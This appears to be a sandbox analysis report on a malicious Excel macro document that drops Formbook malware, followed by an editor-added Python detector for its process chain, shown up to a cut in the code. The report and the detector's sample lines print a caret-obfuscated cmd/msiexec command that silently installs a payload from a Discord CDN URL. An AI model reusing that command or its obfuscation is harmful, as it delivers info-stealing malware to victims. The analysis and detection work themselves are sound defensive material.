Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFC90 NtUnmapViewOfSection, 9_2_021EFC90
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFD5C NtEnumerateKey, 9_2_021EFD5C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F1D80 NtSuspendThread, 9_2_021F1D80
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00099D50 NtCreateFile, 9_2_00099D50
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00099E00 NtReadFile, 9_2_00099E00
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00099E80 NtClose, 9_2_00099E80
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00099F30 NtAllocateVirtualMemory, 9_2_00099F30
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00099DFB NtReadFile, 9_2_00099DFB
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00099F2B NtAllocateVirtualMemory, 9_2_00099F2B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E93CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 9_2_024E93CE
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 9_2_024E9862
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E93D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_024E93D2
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E9DAE NtResumeThread,NtClose, 9_2_024E9DAE
Deletes files inside the Windows folder
Source: C:\Windows\SysWOW64\cmd.exe File deleted: C:\Windows\Installer\MSID8B1.tmp
Detected potential crypto function
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008FE0C6 7_2_008FE0C6
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0092D005 7_2_0092D005
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0091905A 7_2_0091905A
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00903040 7_2_00903040
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008FE2E9 7_2_008FE2E9
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009A1238 7_2_009A1238
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008FF3CF 7_2_008FF3CF
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009263DB 7_2_009263DB
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00902305 7_2_00902305
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00907353 7_2_00907353
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0094A37B 7_2_0094A37B
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00935485 7_2_00935485
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00911489 7_2_00911489
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0093D47D 7_2_0093D47D
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0091C5F0 7_2_0091C5F0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0090351F 7_2_0090351F
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00904680 7_2_00904680
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0090E6C1 7_2_0090E6C1
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009A2622 7_2_009A2622
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0098579A 7_2_0098579A
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0090C7BC 7_2_0090C7BC
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009357C3 7_2_009357C3
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0099F8EE 7_2_0099F8EE
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0090C85C 7_2_0090C85C
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0092286D 7_2_0092286D
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009A098E 7_2_009A098E
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009029B2 7_2_009029B2
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009169FE 7_2_009169FE
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00985955 7_2_00985955
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009B3A83 7_2_009B3A83
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009ACBA4 7_2_009ACBA4
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0098DBDA 7_2_0098DBDA
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008FFBD7 7_2_008FFBD7
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00927B00 7_2_00927B00
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0099FDDD 7_2_0099FDDD
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00930D3B 7_2_00930D3B
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0090CD5B 7_2_0090CD5B
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00932E2F 7_2_00932E2F
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0091EE4C 7_2_0091EE4C
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00910F3F 7_2_00910F3F
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_0092DF7C 7_2_0092DF7C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022A1238 9_2_022A1238
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021FE2E9 9_2_021FE2E9
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02202305 9_2_02202305
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0224A37B 9_2_0224A37B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02207353 9_2_02207353
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022A63BF 9_2_022A63BF
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021FF3CF 9_2_021FF3CF
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022263DB 9_2_022263DB
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0222D005 9_2_0222D005
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02203040 9_2_02203040
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0221905A 9_2_0221905A
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021FE0C6 9_2_021FE0C6
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022A2622 9_2_022A2622
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0224A634 9_2_0224A634
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02204680 9_2_02204680
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0220E6C1 9_2_0220E6C1
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0220C7BC 9_2_0220C7BC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0228579A 9_2_0228579A
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022357C3 9_2_022357C3
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0223D47D 9_2_0223D47D
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02235485 9_2_02235485
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02211489 9_2_02211489
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0220351F 9_2_0220351F
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02246540 9_2_02246540
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0221C5F0 9_2_0221C5F0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022B3A83 9_2_022B3A83
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02227B00 9_2_02227B00
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022ACBA4 9_2_022ACBA4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021FFBD7 9_2_021FFBD7
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0228DBDA 9_2_0228DBDA
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0222286D 9_2_0222286D
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0220C85C 9_2_0220C85C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0229F8EE 9_2_0229F8EE
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02285955 9_2_02285955
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022029B2 9_2_022029B2
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022A098E 9_2_022A098E
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022169FE 9_2_022169FE
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02232E2F 9_2_02232E2F
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0221EE4C 9_2_0221EE4C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02210F3F 9_2_02210F3F
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0222DF7C 9_2_0222DF7C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_02230D3B 9_2_02230D3B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0220CD5B 9_2_0220CD5B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0229FDDD 9_2_0229FDDD
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0009E071 9_2_0009E071
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0009E5FC 9_2_0009E5FC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00082D87 9_2_00082D87
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00089E30 9_2_00089E30
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00082FB0 9_2_00082FB0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E9862 9_2_024E9862
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E1069 9_2_024E1069
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E1072 9_2_024E1072
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E8132 9_2_024E8132
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024EDA6F 9_2_024EDA6F
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024EAA32 9_2_024EAA32
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024EDB0E 9_2_024EDB0E
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E5B1F 9_2_024E5B1F
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E5B22 9_2_024E5B22
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E2CEC 9_2_024E2CEC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024E2CF2 9_2_024E2CF2
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 0d69e4f6_by_Libranalysis.xls OLE, VBA macro line: Private Sub workbook_open()
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function workbook_open Name: workbook_open
Document contains embedded VBA macros
Source: 0d69e4f6_by_Libranalysis.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 0226F970 appears 81 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 021FDF5C appears 118 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 021FE2A8 appears 38 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 0224373B appears 238 times
Source: C:\Windows\SysWOW64\wininit.exe Code function: String function: 02243F92 appears 108 times
Source: C:\Windows\Installer\MSID8B1.tmp Code function: String function: 008FE2A8 appears 38 times
Source: C:\Windows\Installer\MSID8B1.tmp Code function: String function: 0096F970 appears 81 times
Source: C:\Windows\Installer\MSID8B1.tmp Code function: String function: 008FDF5C appears 110 times
Source: C:\Windows\Installer\MSID8B1.tmp Code function: String function: 0094373B appears 238 times
Source: C:\Windows\Installer\MSID8B1.tmp Code function: String function: 00943F92 appears 108 times
Yara signature match
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@12/4@6/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCBB7.tmp
Source: 0d69e4f6_by_Libranalysis.xls OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msiexec.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 0d69e4f6_by_Libranalysis.xls ReversingLabs: Detection: 38%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
Source: unknown Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp
Source: C:\Windows\Installer\MSID8B1.tmp Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp
Source: C:\Windows\Installer\MSID8B1.tmp Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
Source: C:\Windows\SysWOW64\wininit.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp'
Source: C:\Windows\System32\msiexec.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wininit.pdb source: MSID8B1.tmp, 00000007.00000003.2147755225.0000000000520000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: MSID8B1.tmp, wininit.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Windows\Installer\MSID8B1.tmp Unpacked PE file: 7.2.MSID8B1.tmp.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: 0d69e4f6_by_Libranalysis.xls Stream path '_VBA_PROJECT_CUR/VBA/AK2_oiMjTt8L' : High number of string operations
Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module AK2_oiMjTt8L Name: AK2_oiMjTt8L
Obfuscated command line found
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
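The process chain recorded in this report (EXCEL.EXE starts cmd.exe, cmd.exe starts msiexec.exe with an .msi fetched from a remote URL, the installer payload MSID8B1.tmp starts a copy of wininit.exe from SysWOW64, and that wininit.exe starts cmd.exe to delete the payload) and the caret-obfuscated command line "m^SiE^x^e^c" are the two pieces of evidence a detection engineer would want to match automatically. In cmd.exe a caret outside double quotes escapes the next character, so "m^SiE^x^e^c" is parsed as "mSiExec", which is exactly what the sandbox then recorded as the child process. The Python below is an added example written by the editor, not part of the report: it parses "Process created" lines, undoes the caret escaping, and applies a handful of parent/child and command-line rules. The rule names are the editor's assumptions, as is the assumption (noted in the code) that the sandbox renders the original double quotes as single quotes; the sample lines are copied from the report.

```python
import re
from typing import List, NamedTuple, Tuple


class ProcessEvent(NamedTuple):
    parent: str    # image of the creating process ("unknown" when not observed)
    image: str     # image of the created process
    cmdline: str   # command line as recorded by the sandbox


# Assumption: the sandbox prints the original double quotes of a command line as
# single quotes, so both characters delimit a quoted span here. cmd.exe treats
# '^' literally inside double quotes and as an escape character outside them.
_QUOTES = {'"', "'"}

# One "Process created" line: Source: <parent> Process created: <image> <cmdline>
_EVENT = re.compile(
    r"^Source:\s+(?P<parent>.+?)\s+Process created:\s+"
    r"(?P<image>.+?\.(?:exe|tmp|dll|scr|com))(?=\s|$)\s*(?P<cmd>.*)$",
    re.IGNORECASE,
)

# Constructed sample: the process-creation lines of the report above.
PROCESS_LINES = r"""
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
Source: C:\Windows\Installer\MSID8B1.tmp Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp
Source: C:\Windows\Installer\MSID8B1.tmp Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
Source: C:\Windows\SysWOW64\wininit.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp'
""".strip().splitlines()

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "msiexec.exe", "rundll32.exe", "regsvr32.exe"}


def parse_process_events(lines) -> List[ProcessEvent]:
    events = []
    for line in lines:
        m = _EVENT.match(line.strip())
        if m:
            events.append(ProcessEvent(m.group("parent"), m.group("image"), m.group("cmd")))
    return events


def normalize_cmdline(cmd: str) -> str:
    """Remove cmd.exe caret escapes outside quoted spans; case is left untouched."""
    out, in_quotes, i = [], False, 0
    while i < len(cmd):
        ch = cmd[i]
        if ch in _QUOTES:
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes:
            i += 1                       # the escaped character is kept literally
            if i < len(cmd):
                out.append(cmd[i])
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Apply the rules; each finding is (rule name, image of the created process)."""
    known = {e.image.lower() for e in events} | {e.parent.lower() for e in events}
    findings = []
    for e in events:
        parent, child = _basename(e.parent), _basename(e.image)
        norm = normalize_cmdline(e.cmdline)
        low = norm.lower()
        if parent in OFFICE_APPS and child in INTERPRETERS:
            findings.append(("office-spawns-interpreter", e.image))
        if norm != e.cmdline:                      # carets changed the parse
            findings.append(("caret-obfuscated-cmdline", e.image))
        if "msiexec" in low and re.search(r"/i\s+https?://", low):
            findings.append(("msiexec-installs-from-url", e.image))
        if child == "wininit.exe" and parent != "smss.exe":
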